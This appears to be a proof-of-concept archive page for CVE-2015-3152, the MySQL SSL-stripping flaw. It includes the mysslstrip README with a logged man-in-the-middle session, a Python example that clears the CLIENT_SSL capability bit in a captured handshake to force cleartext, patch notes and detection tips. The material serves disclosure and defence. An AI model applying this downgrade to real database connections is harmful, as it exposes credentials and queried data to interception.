
CVE-2015-3152 PoC — Multiple Oracle Products Security Vulnerability

Associated Vulnerability
Title: Multiple Oracle Products Security Vulnerability (CVE-2015-3152)
Description: Oracle MySQL and MariaDB are both database management systems. Oracle MySQL Connector/C (also known as libmysqlclient) is a client library written in C. MySQL and Oracle MySQL Connector/C are products of Oracle Corporation (USA). MariaDB is developed jointly by Monty Program Ab and the MariaDB Foundation. A security vulnerability exists in multiple Oracle products: the client treats the --ssl option as meaning that SSL is optional rather than required. An attacker can, by carrying out a cleartext-downg
Description
CVE-2015-3152 PoC
Readme
# mysslstrip

mysslstrip is a Python-based proof of concept showing how to MITM
MySQL traffic and strip SSL/TLS, as per [CVE-2015-3152](http://www.openwall.com/lists/oss-security/2015/04/29/4).

## Usage

`mysslstrip.py [-h] [-p LISTEN_PORT] [-i LISTEN_INTERFACE] dest`

## Example Output

```
[root@duo1 ~]# python2.7 mysslstrip.py -p 3307 127.0.0.1:3306
2015-04-29 21:33:14+0000 [-] Log opened.
2015-04-29 21:33:14+0000 [-] listen: 127.0.0.1:3307; connect: 127.0.0.1:3306
2015-04-29 21:33:14+0000 [-] MySQLForwardServerFactory starting on 3307
2015-04-29 21:33:14+0000 [-] Starting factory <__main__.MySQLForwardServerFactory instance at 0x7f7769912fc8>
2015-04-29 21:33:21+0000 [__main__.MySQLForwardServerFactory] Starting factory <twisted.internet.endpoints.OneShotFactory instance at 0x7f776787c248>
2015-04-29 21:33:21+0000 [MySQLForwardClientProtocol,client] <class '__main__.MySQLForwardClientProtocol'> received: 'J\x00\x00\x00\n5.6.21\x00\x04\x00\x00\x00"l{I8{%D\x00\xff\xff\x08\x02\x00\x7f\xc0\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00fSPsur[Rg/S6\x00mysql_native_password\x00'
2015-04-29 21:33:21+0000 [MySQLForwardServerProtocol,0,127.0.0.1] <class '__main__.MySQLForwardServerProtocol'> received: '\xb6\x00\x00\x01\x85\xa6\x7f@\x00\x00\x00\x01!\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x14U\xe7\x0b\x0cs\xb5\xf3\x00\x07&=\xa8\xa6\xf9I\xf0\x86}G\xffmysql_native_password\x00e\x03_os\x05Linux\x0c_client_name\x08libmysql\x04_pid\x042361\x0f_client_version\x065.6.21\t_platform\x06x86_64\x0cprogram_name\x05mysql'
2015-04-29 21:33:21+0000 [MySQLForwardClientProtocol,client] <class '__main__.MySQLForwardClientProtocol'> received: '\x07\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00'
2015-04-29 21:33:21+0000 [MySQLForwardServerProtocol,0,127.0.0.1] <class '__main__.MySQLForwardServerProtocol'> received: '!\x00\x00\x00\x03select @@version_comment limit 1'
2015-04-29 21:33:21+0000 [MySQLForwardClientProtocol,client] <class '__main__.MySQLForwardClientProtocol'> received: "\x01\x00\x00\x01\x01'\x00\x00\x02\x03def\x00\x00\x00\x11@@version_comment\x00\x0c!\x00x\x00\x00\x00\xfd\x00\x00\x1f\x00\x00\x05\x00\x00\x03\xfe\x00\x00\x02\x00)\x00\x00\x04(Distributed by The IUS Community Project\x05\x00\x00\x05\xfe\x00\x00\x02\x00"
2015-04-29 21:33:27+0000 [MySQLForwardServerProtocol,0,127.0.0.1] <class '__main__.MySQLForwardServerProtocol'> received: '\x16\x00\x00\x00\x03SELECT "HELLO, WORLD"'
2015-04-29 21:33:27+0000 [MySQLForwardClientProtocol,client] <class '__main__.MySQLForwardClientProtocol'> received: '\x01\x00\x00\x01\x01"\x00\x00\x02\x03def\x00\x00\x00\x0cHELLO, WORLD\x00\x0c!\x00$\x00\x00\x00\xfd\x01\x00\x1f\x00\x00\x05\x00\x00\x03\xfe\x00\x00\x02\x00\r\x00\x00\x04\x0cHELLO, WORLD\x05\x00\x00\x05\xfe\x00\x00\x02\x00'
2015-04-29 21:33:33+0000 [MySQLForwardServerProtocol,0,127.0.0.1] <class '__main__.MySQLForwardServerProtocol'> received: '\x01\x00\x00\x00\x01'
```
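The two packets in the log above are enough to show the downgrade on the wire. What follows is an added example, not code from mysslstrip or from the original README: a small decoder for the MySQL `HandshakeV10` server greeting that clears the `CLIENT_SSL` capability bit the way a man-in-the-middle would, run against the server greeting and the start of the client reply captured in the example output. The field layout follows the public MySQL client/server protocol; the function names are this example's own, and it demonstrates the technique the advisory describes rather than mysslstrip's exact implementation (the PoC's source is not reproduced on this page). Note that the captured client reply carries no `CLIENT_SSL` bit, which is what a stripped session looks like.

```python
"""CVE-2015-3152 on the wire: decode the MySQL HandshakeV10 greeting and clear
the CLIENT_SSL capability bit, which is the cleartext downgrade a MITM performs.
Added example; not code from mysslstrip.  Field layout follows the public MySQL
client/server protocol; the function names are this example's own."""
import struct

CLIENT_SSL = 0x0800  # capability bit: "I support switching to TLS"

# Server greeting captured in the README's example session (real server -> proxy).
SERVER_GREETING = (
    b'J\x00\x00\x00\n5.6.21\x00\x04\x00\x00\x00"l{I8{%D\x00\xff\xff\x08\x02\x00'
    b'\x7f\xc0\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00fSPsur[Rg/S6\x00'
    b'mysql_native_password\x00'
)
# Start of the client's reply from the same capture, truncated here to the packet
# header, capability flags, max packet size and charset (the fields we inspect).
CLIENT_RESPONSE_PREFIX = b'\xb6\x00\x00\x01\x85\xa6\x7f@\x00\x00\x00\x01!'


def split_packet(data):
    """Return (sequence_id, payload) for one MySQL packet, checking the 3-byte length."""
    length = int.from_bytes(data[:3], 'little')
    payload = data[4:4 + length]
    if len(payload) != length:
        raise ValueError('truncated packet: header says %d bytes, got %d' % (length, len(payload)))
    return data[3], payload


def parse_handshake_v10(packet):
    """Decode the HandshakeV10 fields that matter for the downgrade."""
    seq, p = split_packet(packet)
    if p[0] != 10:
        raise ValueError('protocol version %d is not HandshakeV10' % p[0])
    end = p.index(b'\x00', 1)
    version = p[1:end].decode('ascii')
    off = end + 1
    conn_id = struct.unpack_from('<I', p, off)[0]
    off += 4
    auth_data = p[off:off + 8]          # auth-plugin-data-part-1
    off += 8 + 1                        # ... followed by one filler byte
    cap_lo_off = off                    # lower 16 bits of the capability flags
    cap_lo = struct.unpack_from('<H', p, off)[0]
    off += 2
    charset = p[off]
    off += 1
    status = struct.unpack_from('<H', p, off)[0]
    off += 2
    cap_hi_off = off                    # upper 16 bits of the capability flags
    cap_hi = struct.unpack_from('<H', p, off)[0]
    off += 2
    auth_len = p[off]
    off += 1 + 10                       # length byte plus 10 reserved bytes
    part2_len = max(13, auth_len - 8)   # auth-plugin-data-part-2, NUL padded
    auth_data += p[off:off + part2_len].rstrip(b'\x00')
    off += part2_len
    plugin = p[off:p.index(b'\x00', off)].decode('ascii')
    return {
        'sequence_id': seq,
        'server_version': version,
        'connection_id': conn_id,
        'capabilities': (cap_hi << 16) | cap_lo,
        'capability_offsets': (4 + cap_lo_off, 4 + cap_hi_off),  # offsets in the raw packet
        'charset': charset,
        'status': status,
        'auth_plugin_data': bytes(auth_data),
        'auth_plugin': plugin,
    }


def server_offers_ssl(packet):
    return bool(parse_handshake_v10(packet)['capabilities'] & CLIENT_SSL)


def strip_ssl_capability(packet):
    """The MITM step: clear CLIENT_SSL in the greeting.  A client that treats --ssl
    as optional then never sends SSLRequest and continues in cleartext.  The packet
    length does not change, so the length header stays valid."""
    lo_off, _ = parse_handshake_v10(packet)['capability_offsets']
    out = bytearray(packet)
    cap_lo = struct.unpack_from('<H', out, lo_off)[0]
    struct.pack_into('<H', out, lo_off, cap_lo & ~CLIENT_SSL & 0xffff)
    return bytes(out)


def client_capabilities(packet):
    """Capability flags are the first four payload bytes of both SSLRequest and
    HandshakeResponse41, so only the header and those bytes are needed."""
    return struct.unpack_from('<I', packet, 4)[0]


def client_requested_ssl(packet):
    """True if the client's first packet is an SSLRequest (TLS about to start)."""
    return bool(client_capabilities(packet) & CLIENT_SSL)


if __name__ == '__main__':
    before = parse_handshake_v10(SERVER_GREETING)
    stripped = strip_ssl_capability(SERVER_GREETING)
    after = parse_handshake_v10(stripped)
    print('server %s caps 0x%08x -> 0x%08x, CLIENT_SSL offered: %s -> %s' % (
        before['server_version'], before['capabilities'], after['capabilities'],
        server_offers_ssl(SERVER_GREETING), server_offers_ssl(stripped)))
    print('client caps 0x%08x, requested TLS: %s' % (
        client_capabilities(CLIENT_RESPONSE_PREFIX), client_requested_ssl(CLIENT_RESPONSE_PREFIX)))
```

`client_requested_ssl` is also the check a passive detector wants: because the flags sit at the same offset in `SSLRequest` and `HandshakeResponse41`, the first client packet after the greeting tells you whether the session is going to TLS or is proceeding in cleartext, and a greeting that lost `CLIENT_SSL` between server and client is the downgrade itself.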

## Additional Information


**Is this a real vulnerability?**

Yes! Encrypt all the things. Allowing opportunistic degradation of encryption is pretty poor practice.

The vulnerability affects MySQL 5.7.2 and earlier, MySQL Connector/C (libmysqlclient) 6.1.2 and earlier, all versions of Percona Server and all versions of MariaDB.

**Patch?**

It's been fixed in [MySQL 5.7.3](http://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-3.html) ... but the security
patch hasn't been backported to any other version, so if you're on 5.6 like [99.99%](https://scans.io/data/umich/dadrian/backronym/banners.mysql.20150429.json) of the Internet is, you're out of
luck unless you switch to the 5.7 "preview release". Whatever version you run, you can confirm that a given session actually negotiated TLS by running `SHOW STATUS LIKE 'Ssl_cipher'` over it: an empty value means the connection is in cleartext.

Created by [Adam Goodman](https://twitter.com/akgood) of [Duo Labs](https://labs.duosecurity.com).

**Inquiries?**

PR Inquiries: [this.is.a.really.big.deal@duosecurity.com](mailto:this.is.a.really.big.deal@duosecurity.com)  
Technical Inquiries: [this.isnt.a.big.deal.but.you.should.still.patch@duosecurity.com](mailto:this.isnt.a.big.deal.but.you.should.still.patch@duosecurity.com)  
Twitters: [@duo\_labs](https://twitter.com/duo_labs)

### References

[http://backronym.fail](http://backronym.fail)  
[https://www.duosecurity.com/blog/backronym-mysql-vulnerability](https://www.duosecurity.com/blog/backronym-mysql-vulnerability)  
[http://www.openwall.com/lists/oss-security/2015/04/29/4](http://www.openwall.com/lists/oss-security/2015/04/29/4)  
[http://www.ocert.org/advisories/ocert-2015-003.html](http://www.ocert.org/advisories/ocert-2015-003.html)  
[https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3152](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3152)
File Snapshot

[4.0K] /data/pocs/232f27510be14cb51a34ad3650ced68b287bc2cf
├── [8.9K] mysslstrip.py
├── [4.5K] README.md
└── [ 34] requirements.txt

0 directories, 3 files